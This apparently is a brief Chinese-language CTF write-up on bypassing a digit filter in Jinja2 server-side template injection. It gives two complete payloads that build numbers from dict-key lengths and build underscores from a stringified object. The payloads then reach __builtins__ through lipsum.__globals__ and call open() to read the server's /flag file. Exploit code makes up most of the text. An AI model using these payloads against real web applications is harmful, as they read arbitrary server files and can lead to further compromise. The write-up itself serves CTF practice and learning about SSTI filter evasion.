image-20260115114254778

1.模糊测试加了过滤数字

image-20260115114354649

1
2
3
4
{% raw %}
{%set b=dict(aaaa)|join|count%}为4,所以这里用count绕过

{% endraw %}

payload同上一个题一样,只是加了构造数字

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{% raw %}
{%set b=dict(cccccccccccccccccccccccc=a)|join|count%}
{%set c=dict(ccccccccccccccccccccccccccccccccccccccccccccccc=a)|join|count%}
{%set d=dict(cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc=a)|join|count%}
{%set e=dict(cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc=a)|join|count%}
{%set f=dict(ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc=a)|join|count%}
{%set g=dict(ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd=a)|join|count%}
{%set a=(()|select|string|list).pop(b)%}
{%set glo=(a,a,dict(globals=a)|join,a,a)|join%}
{%set buil=(a,a,dict(builtins=a)|join,a,a)|join%}
{%set x=(lipsum|attr(glo)).get(buil)%}
{%print(x.open(x.chr(c)%2bx.chr(d)%2bx.chr(e)%2bx.chr(f)%2bx.chr(g)).read())%}

{% endraw %}

image-20260115115822916

1
2
3
4
5
6
7
8
{% raw %}
{%set a=(()|select|string|list).pop(24)%}
{%set glo=(a,a,dict(globals=a)|join,a,a)|join%}
{%set buil=(a,a,dict(builtins=a)|join,a,a)|join%}
{%set x=(lipsum|attr(glo)).get(buil)%}
{%print(x.open(x.chr(47)%2bx.chr(102)%2bx.chr(108)%2bx.chr(97)%2bx.chr(103)).read())%}

{% endraw %}